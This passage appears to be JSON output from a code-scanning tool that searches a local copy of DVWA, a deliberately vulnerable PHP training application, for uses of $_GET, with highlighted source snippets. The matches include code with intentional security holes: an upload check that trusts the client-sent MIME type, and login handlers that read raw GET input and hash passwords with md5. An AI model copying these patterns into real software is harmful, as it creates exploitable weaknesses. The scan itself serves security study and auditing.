"match": "<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/jpeg\"</span> || <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"image/png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\"><</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Can we move the file <span class=\"token keyword\">to</span> the upload folder<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">move_uploaded_file</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> No\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'<pre>Your image was not uploaded.</pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t}\n<span class=\"line-number\">22:</span> \t\t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">23:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Yes!",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 27,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">38:</span> return <span class=\"token variable\">$data</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">39:</span> }\n<span class=\"line-number\">40:</span> \n<span class=\"line-number\">41:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Clear PHPIDS log\n<span class=\"line-number\">42:</span> function <span class=\"token function\">dvwaClearIdsLog</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\t{\n<span class=\"highlight\"><span class=\"line-number\">43:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'clear_log'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">44:</span> \t\t<span class=\"token variable\">$fp</span> <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS_LOG<span class=\"token punctuation\">,</span> w <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">45:</span> \t\t<span class=\"token function\">fclose</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$fp</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">46:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"PHPIDS log cleared\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">47:</span> \t\t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> \t}",
"line": 43,
"start": 38,
"end": 49,
"severity": "unknown",
"note": ""
},
{
"id": 28,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">58:</span> \t\t<span class=\"token operator\">*</span> Please keep <span class=\"token keyword\">in</span> mind what array_merge does <span class=\"token operator\">and</span> how this might interfer\n<span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">*</span> <span class=\"token keyword\">with</span> your variables_order settings\n<span class=\"line-number\">60:</span> \t\t<span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$request</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>\n<span class=\"line-number\">62:</span> \t\t\t<span class=\"token string\">'REQUEST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">63:</span> \t\t\t<span class=\"token string\">'GET'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">64:</span> \t\t\t<span class=\"token string\">'POST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">65:</span> \t\t\t<span class=\"token string\">'COOKIE'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_COOKIE</span>\n<span class=\"line-number\">66:</span> \t\t<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">67:</span> \n<span class=\"line-number\">68:</span> \t\t<span class=\"token variable\">$init</span> <span class=\"token operator\">=</span> IDS_Init<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token function\">init</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'lib/IDS/Config/Config.ini'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 63,
"start": 58,
"end": 69,
"severity": "unknown",
"note": ""
},
{
"id": 41,
"file": "/home/chris/src/DVWA-master/instructions.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">15:</span> \t<span class=\"token string\">'changelog'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'legend'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">'Change Log'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'file'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">'CHANGELOG.md'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token string\">'copying'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'legend'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">'Copying'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'file'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">'COPYING.txt'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token string\">'PHPIDS-license'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'legend'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">'PHPIDS License'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'file'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'LICENSE'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">18:</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \n<span class=\"highlight\"><span class=\"line-number\">20:</span> <span class=\"token variable\">$selectedDocId</span> <span class=\"token operator\">=</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'doc'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'doc'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">21:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$selectedDocId</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$docs</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$selectedDocId</span> <span class=\"token operator\">=</span> <span class=\"token string\">'readme'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> }\n<span class=\"line-number\">24:</span> <span class=\"token variable\">$readFile</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$docs</span><span class=\"token punctuation\">[</span> <span class=\"token variable\">$selectedDocId</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'file'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> ",
"line": 20,
"start": 15,
"end": 26,
"severity": "unknown",
"note": ""
},
{
"id": 50,
"file": "/home/chris/src/DVWA-master/security.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">33:</span> \t<span class=\"token function\">dvwaSecurityLevelSet</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$securityLevel</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">34:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Security level set to {$securityLevel}\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">35:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">36:</span> }\n<span class=\"line-number\">37:</span> \n<span class=\"highlight\"><span class=\"line-number\">38:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span><span class=\"token string\">'phpids'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">39:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">40:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'on'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">41:</span> \t\t\t<span class=\"token function\">dvwaPhpIdsEnabledSet</span><span class=\"token punctuation\">(</span> <span class=\"token boolean\">true</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">42:</span> \t\t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"PHPIDS is now enabled\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">43:</span> \t\t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 38,
"start": 33,
"end": 44,
"severity": "unknown",
"note": ""
},
{
"id": 51,
"file": "/home/chris/src/DVWA-master/security.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">34:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Security level set to {$securityLevel}\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">35:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">36:</span> }\n<span class=\"line-number\">37:</span> \n<span class=\"line-number\">38:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span><span class=\"token string\">'phpids'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">39:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">40:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'on'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">41:</span> \t\t\t<span class=\"token function\">dvwaPhpIdsEnabledSet</span><span class=\"token punctuation\">(</span> <span class=\"token boolean\">true</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">42:</span> \t\t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"PHPIDS is now enabled\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">43:</span> \t\t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">44:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'off'</span><span class=\"token punctuation\">:</span>",
"line": 39,
"start": 34,
"end": 45,
"severity": "unknown",
"note": ""
},
{
"id": 63,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 64,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 65,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database",
"line": 13,
"start": 8,
"end": 19,
"severity": "unknown",
"note": ""
},
{
"id": 77,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/low.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get username\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get password\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 78,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/low.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get username\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get password\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token 